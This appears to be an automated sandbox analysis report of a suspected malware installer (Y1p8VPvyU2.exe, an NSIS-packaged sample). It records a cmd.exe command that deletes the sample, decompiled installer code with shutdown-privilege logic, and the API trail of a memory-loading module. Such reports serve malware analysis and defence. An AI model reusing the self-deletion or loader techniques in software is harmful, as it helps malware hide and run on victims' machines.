                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
                                    Imagebase:0xd80000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:19:59:46
                                    Start date:02/12/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7f20f0000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis

                                      Executed Functions

                                      C-Code - Quality: 83%
                                      			_entry_() {
                                      				struct _SHFILEINFOA _v360;
                                      				struct _SECURITY_ATTRIBUTES* _v376;
                                      				char _v380;
                                      				CHAR* _v384;
                                      				char _v396;
                                      				int _v400;
                                      				int _v404;
                                      				CHAR* _v408;
                                      				intOrPtr _v412;
                                      				int _v416;
                                      				intOrPtr _v420;
                                      				struct _SECURITY_ATTRIBUTES* _v424;
                                      				void* _v432;
                                      				int _t34;
                                      				CHAR* _t39;
                                      				char* _t42;
                                      				signed int _t44;
                                      				void* _t48;
                                      				intOrPtr _t50;
                                      				signed int _t52;
                                      				signed int _t55;
                                      				int _t56;
                                      				signed int _t60;
                                      				intOrPtr _t71;
                                      				intOrPtr _t77;
                                      				void* _t79;
                                      				void* _t89;
                                      				void* _t91;
                                      				char* _t96;
                                      				signed int _t97;
                                      				void* _t98;
                                      				signed int _t99;
                                      				signed int _t100;
                                      				signed int _t103;
                                      				CHAR* _t105;
                                      				signed int _t106;
                                      				intOrPtr _t113;
                                      				char _t120;
                                      
                                      				_v376 = 0;
                                      				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                                      				_t99 = 0;
                                      				_v380 = 0x20;
                                      				__imp__#17();
                                      				_t34 = SetErrorMode(0x8001); // executed
                                      				__imp__OleInitialize(0); // executed
                                      				 *0x42ec18 = _t34;
                                      				 *0x42eb64 = E00405C49(8);
                                      				SHGetFileInfoA(0x428f90, 0,  &_v360, 0x160, 0); // executed
                                      				E0040592B("oryzytcrolozawnhxg Setup", "NSIS Error");
                                      				_t39 = GetCommandLineA();
                                      				_t96 = "\"C:\\Users\\hardz\\Desktop\\Y1p8VPvyU2.exe\" ";
                                      				E0040592B(_t96, _t39);
                                      				 *0x42eb60 = GetModuleHandleA(0);
                                      				_t42 = _t96;
                                      				if("\"C:\\Users\\hardz\\Desktop\\Y1p8VPvyU2.exe\" " == 0x22) {
                                      					_v404 = 0x22;
                                      					_t42 =  &M00434001;
                                      				}
                                      				_t44 = CharNextA(E00405449(_t42, _v404));
                                      				_v404 = _t44;
                                      				while(1) {
                                      					_t91 =  *_t44;
                                      					_t109 = _t91;
                                      					if(_t91 == 0) {
                                      						break;
                                      					}
                                      					__eflags = _t91 - 0x20;
                                      					if(_t91 != 0x20) {
                                      						L5:
                                      						__eflags =  *_t44 - 0x22;
                                      						_v404 = 0x20;
                                      						if( *_t44 == 0x22) {
                                      							_t44 = _t44 + 1;
                                      							__eflags = _t44;
                                      							_v404 = 0x22;
                                      						}
                                      						__eflags =  *_t44 - 0x2f;
                                      						if( *_t44 != 0x2f) {
                                      							L15:
                                      							_t44 = E00405449(_t44, _v404);
                                      							__eflags =  *_t44 - 0x22;
                                      							if(__eflags == 0) {
                                      								_t44 = _t44 + 1;
                                      								__eflags = _t44;
                                      							}
                                      							continue;
                                      						} else {
                                      							_t44 = _t44 + 1;
                                      							__eflags =  *_t44 - 0x53;
                                      							if( *_t44 == 0x53) {
                                      								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                                      								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                                      									_t99 = _t99 | 0x00000002;
                                      									__eflags = _t99;
                                      								}
                                      							}
                                      							__eflags =  *_t44 - 0x4352434e;
                                      							if( *_t44 == 0x4352434e) {
                                      								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                                      								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                                      									_t99 = _t99 | 0x00000004;
                                      									__eflags = _t99;
                                      								}
                                      							}
                                      							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                                      							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                                      								 *((intOrPtr*)(_t44 - 2)) = 0;
                                      								_t45 = _t44 + 2;
                                      								__eflags = _t44 + 2;
                                      								E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t45);
                                      								L20:
                                      								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                      								GetTempPathA(0x400, _t105);
                                      								_t48 = E004030AF(_t109);
                                      								_t110 = _t48;
                                      								if(_t48 != 0) {
                                      									L22:
                                      									DeleteFileA("1033"); // executed
                                      									_t50 = E00402C0B(_t111, _t99); // executed
                                      									_v412 = _t50;
                                      									if(_t50 != 0) {
                                      										L32:
                                      										E00403464();
                                      										__imp__OleUninitialize();
                                      										if(_v408 == 0) {
                                      											__eflags =  *0x42ebf4; // 0x0
                                      											if(__eflags != 0) {
                                      												_t106 = E00405C49(3);
                                      												_t100 = E00405C49(4);
                                      												_t55 = E00405C49(5);
                                      												__eflags = _t106;
                                      												_t97 = _t55;
                                      												if(_t106 != 0) {
                                      													__eflags = _t100;
                                      													if(_t100 != 0) {
                                      														__eflags = _t97;
                                      														if(_t97 != 0) {
                                      															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                                      															__eflags = _t60;
                                      															if(_t60 != 0) {
                                      																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                                      																_v416 = 1;
                                      																_v404 = 2;
                                      																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                                      															}
                                      														}
                                      													}
                                      												}
                                      												_t56 = ExitWindowsEx(2, 0);
                                      												__eflags = _t56;
                                      												if(_t56 == 0) {
                                      													E0040140B(9);
                                      												}
                                      											}
                                      											_t52 =  *0x42ec0c; // 0xffffffff
                                      											__eflags = _t52 - 0xffffffff;
                                      											if(_t52 != 0xffffffff) {
                                      												_v400 = _t52;
                                      											}
                                      											ExitProcess(_v400);
                                      										}
                                      										E004051EC(_v408, 0x200010);
                                      										ExitProcess(2);
                                      									}
                                      									_t113 =  *0x42eb7c; // 0x0
                                      									if(_t113 == 0) {
                                      										L31:
                                      										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
                                      										_v400 = E00403489();
                                      										goto L32;
                                      									}
                                      									_t103 = E00405449(_t96, 0);
                                      									while(_t103 >= _t96) {
                                      										__eflags =  *_t103 - 0x3d3f5f20;
                                      										if(__eflags == 0) {
                                      											break;
                                      										}
                                      										_t103 = _t103 - 1;
                                      										__eflags = _t103;
                                      									}
                                      									_t115 = _t103 - _t96;
                                      									_v408 = "Error launching installer";
                                      									if(_t103 < _t96) {
                                      										lstrcatA(_t105, "~nsu.tmp");
                                      										_t101 = "C:\\Users\\hardz\\Desktop";
                                      										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
                                      											goto L32;
                                      										}
                                      										CreateDirectoryA(_t105, 0);
                                      										SetCurrentDirectoryA(_t105);
                                      										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                                      										if(_t120 == 0) {
                                      											E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t101);
                                      										}
                                      										E0040592B(0x42f000, _v396);
                                      										 *0x42f400 = 0x41;
                                      										_t98 = 0x1a;
                                      										do {
                                      											_t71 =  *0x42eb70; // 0x720250
                                      											E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t71 + 0x120)));
                                      											DeleteFileA(0x428b90);
                                      											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\Y1p8VPvyU2.exe", 0x428b90, 1) != 0) {
                                      												_push(0);
                                      												_push(0x428b90);
                                      												E00405679();
                                      												_t77 =  *0x42eb70; // 0x720250
                                      												E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t77 + 0x124)));
                                      												_t79 = E0040518B(0x428b90);
                                      												if(_t79 != 0) {
                                      													CloseHandle(_t79);
                                      													_v416 = 0;
                                      												}
                                      											}
                                      											 *0x42f400 =  *0x42f400 + 1;
                                      											_t98 = _t98 - 1;
                                      										} while (_t98 != 0);
                                      										_push(0);
                                      										_push(_t105);
                                      										E00405679();
                                      										goto L32;
                                      									}
                                      									 *_t103 = 0;
                                      									_t104 = _t103 + 4;
                                      									if(E004054FF(_t115, _t103 + 4) == 0) {
                                      										goto L32;
                                      									}
                                      									E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
                                      									E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
                                      									_v424 = 0;
                                      									goto L31;
                                      								}
                                      								GetWindowsDirectoryA(_t105, 0x3fb);
                                      								lstrcatA(_t105, "\\Temp");
                                      								_t89 = E004030AF(_t110);
                                      								_t111 = _t89;
                                      								if(_t89 == 0) {
                                      									goto L32;
                                      								}
                                      								goto L22;
                                      							}
                                      							goto L15;
                                      						}
                                      					} else {
                                      						goto L4;
                                      					}
                                      					do {
                                      						L4:
                                      						_t44 = _t44 + 1;
                                      						__eflags =  *_t44 - 0x20;
                                      					} while ( *_t44 == 0x20);
                                      					goto L5;
                                      				}
                                      				goto L20;
                                      			}


                                      APIs
                                      • #17.COMCTL32 ref: 00403102
                                      • SetErrorMode.KERNELBASE(00008001), ref: 0040310D
                                      • OleInitialize.OLE32(00000000), ref: 00403114
                                        • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                        • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                        • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                      • SHGetFileInfoA.SHELL32(00428F90,00000000,?,00000160,00000000,00000008), ref: 0040313C
                                        • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,oryzytcrolozawnhxg Setup,NSIS Error), ref: 00405938
                                      • GetCommandLineA.KERNEL32(oryzytcrolozawnhxg Setup,NSIS Error), ref: 00403151
                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 00403164
                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000020), ref: 0040318F
                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403222
                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403237
                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403243
                                      • DeleteFileA.KERNELBASE(1033), ref: 00403256
                                      • OleUninitialize.OLE32(00000000), ref: 004032D4
                                      • ExitProcess.KERNEL32 ref: 004032F4
                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000,00000000), ref: 00403300
                                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000,00000000), ref: 0040330C
                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403318
                                      • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040331F
                                      • DeleteFileA.KERNEL32(00428B90,00428B90,?,0042F000,?), ref: 00403369
                                      • CopyFileA.KERNEL32(C:\Users\user\Desktop\Y1p8VPvyU2.exe,00428B90,00000001), ref: 0040337D
                                      • CloseHandle.KERNEL32(00000000,00428B90,00428B90,?,00428B90,00000000), ref: 004033AA
                                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FF
                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0040343B
                                      • ExitProcess.KERNEL32 ref: 0040345E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                      • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\Y1p8VPvyU2.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Y1p8VPvyU2.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$oryzytcrolozawnhxg Setup$~nsu.tmp
                                      • API String ID: 2278157092-3211056458
                                      • Opcode ID: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                      • Instruction ID: aabb0dff5c64eb2fc36eb922ef2e6ed89ac062b0c308e186071ee6cedd25840a
                                      • Opcode Fuzzy Hash: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                      • Instruction Fuzzy Hash: F491E370908740AEE7216FA2AD49B6B7E9CEB0570AF04047FF541B61D2C77C9E058B6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E00405250(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				struct _WIN32_FIND_DATAA _v332;
                                      				signed int _t37;
                                      				char* _t49;
                                      				signed int _t52;
                                      				signed int _t55;
                                      				signed int _t61;
                                      				signed int _t63;
                                      				void* _t65;
                                      				signed int _t68;
                                      				CHAR* _t70;
                                      				CHAR* _t72;
                                      				char* _t75;
                                      
                                      				_t72 = _a4;
                                      				_t37 = E004054FF(__eflags, _t72);
                                      				_v12 = _t37;
                                      				if((_a8 & 0x00000008) != 0) {
                                      					_t63 = DeleteFileA(_t72); // executed
                                      					asm("sbb eax, eax");
                                      					_t65 =  ~_t63 + 1;
                                      					 *0x42ebe8 =  *0x42ebe8 + _t65;
                                      					return _t65;
                                      				}
                                      				_t68 = _a8 & 0x00000001;
                                      				__eflags = _t68;
                                      				_v8 = _t68;
                                      				if(_t68 == 0) {
                                      					L5:
                                      					E0040592B(0x42afe0, _t72);
                                      					__eflags = _t68;
                                      					if(_t68 == 0) {
                                      						E00405465(_t72);
                                      					} else {
                                      						lstrcatA(0x42afe0, "\*.*");
                                      					}
                                      					__eflags =  *_t72;
                                      					if( *_t72 != 0) {
                                      						L10:
                                      						lstrcatA(_t72, 0x40900c);
                                      						L11:
                                      						_t70 =  &(_t72[lstrlenA(_t72)]);
                                      						_t37 = FindFirstFileA(0x42afe0,  &_v332);
                                      						__eflags = _t37 - 0xffffffff;
                                      						_a4 = _t37;
                                      						if(_t37 == 0xffffffff) {
                                      							L29:
                                      							__eflags = _v8;
                                      							if(_v8 != 0) {
                                      								_t31 = _t70 - 1;
                                      								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                      								__eflags =  *_t31;
                                      							}
                                      							goto L31;
                                      						} else {
                                      							goto L12;
                                      						}
                                      						do {
                                      							L12:
                                      							_t75 =  &(_v332.cFileName);
                                      							_t49 = E00405449( &(_v332.cFileName), 0x3f);
                                      							__eflags =  *_t49;
                                      							if( *_t49 != 0) {
                                      								__eflags = _v332.cAlternateFileName;
                                      								if(_v332.cAlternateFileName != 0) {
                                      									_t75 =  &(_v332.cAlternateFileName);
                                      								}
                                      							}
                                      							__eflags =  *_t75 - 0x2e;
                                      							if( *_t75 != 0x2e) {
                                      								L19:
                                      								E0040592B(_t70, _t75);
                                      								__eflags = _v332.dwFileAttributes & 0x00000010;
                                      								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                      									E004055E3(_t72);
                                      									_t52 = DeleteFileA(_t72);
                                      									__eflags = _t52;
                                      									if(_t52 != 0) {
                                      										E00404CC9(0xfffffff2, _t72);
                                      									} else {
                                      										__eflags = _a8 & 0x00000004;
                                      										if((_a8 & 0x00000004) == 0) {
                                      											 *0x42ebe8 =  *0x42ebe8 + 1;
                                      										} else {
                                      											E00404CC9(0xfffffff1, _t72);
                                      											_push(0);
                                      											_push(_t72);
                                      											E00405679();
                                      										}
                                      									}
                                      								} else {
                                      									__eflags = (_a8 & 0x00000003) - 3;
                                      									if(__eflags == 0) {
                                      										E00405250(_t70, __eflags, _t72, _a8);
                                      									}
                                      								}
                                      								goto L27;
                                      							}
                                      							_t61 =  *((intOrPtr*)(_t75 + 1));
                                      							__eflags = _t61;
                                      							if(_t61 == 0) {
                                      								goto L27;
                                      							}
                                      							__eflags = _t61 - 0x2e;
                                      							if(_t61 != 0x2e) {
                                      								goto L19;
                                      							}
                                      							__eflags =  *((char*)(_t75 + 2));
                                      							if( *((char*)(_t75 + 2)) == 0) {
                                      								goto L27;
                                      							}
                                      							goto L19;
                                      							L27:
                                      							_t55 = FindNextFileA(_a4,  &_v332);
                                      							__eflags = _t55;
                                      						} while (_t55 != 0);
                                      						_t37 = FindClose(_a4);
                                      						goto L29;
                                      					}
                                      					__eflags =  *0x42afe0 - 0x5c;
                                      					if( *0x42afe0 != 0x5c) {
                                      						goto L11;
                                      					}
                                      					goto L10;
                                      				} else {
                                      					__eflags = _t37;
                                      					if(_t37 == 0) {
                                      						L31:
                                      						__eflags = _v8;
                                      						if(_v8 == 0) {
                                      							L39:
                                      							return _t37;
                                      						}
                                      						__eflags = _v12;
                                      						if(_v12 != 0) {
                                      							_t37 = E00405C22(_t72);
                                      							__eflags = _t37;
                                      							if(_t37 == 0) {
                                      								goto L39;
                                      							}
                                      							E0040541E(_t72);
                                      							E004055E3(_t72);
                                      							_t37 = RemoveDirectoryA(_t72);
                                      							__eflags = _t37;
                                      							if(_t37 != 0) {
                                      								return E00404CC9(0xffffffe5, _t72);
                                      							}
                                      							__eflags = _a8 & 0x00000004;
                                      							if((_a8 & 0x00000004) == 0) {
                                      								goto L33;
                                      							}
                                      							E00404CC9(0xfffffff1, _t72);
                                      							_push(0);
                                      							_push(_t72);
                                      							return E00405679();
                                      						}
                                      						L33:
                                      						 *0x42ebe8 =  *0x42ebe8 + 1;
                                      						return _t37;
                                      					}
                                      					__eflags = _a8 & 0x00000002;
                                      					if((_a8 & 0x00000002) == 0) {
                                      						goto L31;
                                      					}
                                      					goto L5;
                                      				}
                                      			}


                                      APIs
                                      • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 0040526E
                                      • lstrcatA.KERNEL32(0042AFE0,\*.*,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 004052B8
                                      • lstrcatA.KERNEL32(?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 004052D9
                                      • lstrlenA.KERNEL32(?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 004052DF
                                      • FindFirstFileA.KERNEL32(0042AFE0,?,?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 004052F0
                                      • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004053A2
                                      • FindClose.KERNEL32(?), ref: 004053B3
                                      Strings
                                      • "C:\Users\user\Desktop\Y1p8VPvyU2.exe" , xrefs: 0040525A
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405250
                                      • \*.*, xrefs: 004052B2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                      • API String ID: 2035342205-85063897
                                      • Opcode ID: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                      • Instruction ID: 18b38f57d6fcfee0f7be8354c3f8d746a349f6914723925c053c0c26f7a8b105
                                      • Opcode Fuzzy Hash: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                      • Instruction Fuzzy Hash: DF512270804B54A6DB226B228C45BBF3A68CF82759F14817FFC45751C2C7BC4982CE6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100218C4
                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,10021572,7FC6FA16,10021731), ref: 100218EE
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,10021572,7FC6FA16), ref: 10021905
                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,10021572,7FC6FA16,10021731), ref: 10021927
                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,10021572,7FC6FA16,10021731,00000000,00000000), ref: 1002199A
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,10021572,7FC6FA16,10021731), ref: 100219A5
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,10021572,7FC6FA16,10021731,00000000), ref: 100219F0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                      • String ID:
                                      • API String ID: 656311269-0
                                      • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                      • Instruction ID: 3dbdf73d719aeac6aafdfdac4e0ef6f9e424ef23ee5861aafd292a39fed29027
                                      • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                      • Instruction Fuzzy Hash: C1619F39F00208ABCB11DFA4E894BEEB7B6EF58710F604059E955EB390EB349D41CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405C49(signed int _a4) {
                                      				struct HINSTANCE__* _t5;
                                      				CHAR* _t7;
                                      				signed int _t9;
                                      
                                      				_t9 = _a4 << 3;
                                      				_t7 =  *(_t9 + 0x4091f8);
                                      				_t5 = GetModuleHandleA(_t7);
                                      				if(_t5 != 0) {
                                      					L2:
                                      					return GetProcAddress(_t5,  *(_t9 + 0x4091fc));
                                      				}
                                      				_t5 = LoadLibraryA(_t7); // executed
                                      				if(_t5 != 0) {
                                      					goto L2;
                                      				}
                                      				return _t5;
                                      			}







                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                      • LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: AddressHandleLibraryLoadModuleProc
                                      • String ID:
                                      • API String ID: 310444273-0
                                      • Opcode ID: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                      • Instruction ID: 3d59114c1a23b0d625c809938346f6a0554fd3dae4d1067b70da7b5bee76f7f8
                                      • Opcode Fuzzy Hash: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                      • Instruction Fuzzy Hash: B4E08632A0861557E6114F309E4CD6773A8DE866403010439F505F6140D734AC11AFBA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405C22(CHAR* _a4) {
                                      				void* _t2;
                                      
                                      				_t2 = FindFirstFileA(_a4, 0x42c028); // executed
                                      				if(_t2 == 0xffffffff) {
                                      					return 0;
                                      				}
                                      				FindClose(_t2);
                                      				return 0x42c028;
                                      			}





                                      APIs
                                      • FindFirstFileA.KERNELBASE(?,0042C028,0042B3E0,00405542,0042B3E0,0042B3E0,00000000,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 00405C2D
                                      • FindClose.KERNEL32(00000000), ref: 00405C39
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                      • Instruction ID: 1d1880cbde17bc14012e82a4269dfe036a3ba599bb462203ffcaea8973668f8b
                                      • Opcode Fuzzy Hash: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                      • Instruction Fuzzy Hash: A5D0123694DA209BD3541778BD0CC8B7A58DF593317104B32F026F22E4D7388C518EAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E0040380A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                      				struct HWND__* _v32;
                                      				void* _v84;
                                      				void* _v88;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t35;
                                      				signed int _t37;
                                      				signed int _t39;
                                      				intOrPtr _t44;
                                      				struct HWND__* _t49;
                                      				signed int _t67;
                                      				struct HWND__* _t73;
                                      				signed int _t86;
                                      				struct HWND__* _t91;
                                      				signed int _t99;
                                      				int _t103;
                                      				signed int _t115;
                                      				signed int _t116;
                                      				int _t117;
                                      				signed int _t122;
                                      				struct HWND__* _t125;
                                      				struct HWND__* _t126;
                                      				int _t127;
                                      				long _t130;
                                      				int _t132;
                                      				int _t133;
                                      				void* _t134;
                                      				void* _t142;
                                      
                                      				_t115 = _a8;
                                      				if(_t115 == 0x110 || _t115 == 0x408) {
                                      					_t35 = _a12;
                                      					_t125 = _a4;
                                      					__eflags = _t115 - 0x110;
                                      					 *0x429fbc = _t35;
                                      					if(_t115 == 0x110) {
                                      						 *0x42eb68 = _t125;
                                      						 *0x429fd0 = GetDlgItem(_t125, 1);
                                      						_t91 = GetDlgItem(_t125, 2);
                                      						_push(0xffffffff);
                                      						_push(0x1c);
                                      						 *0x428f98 = _t91;
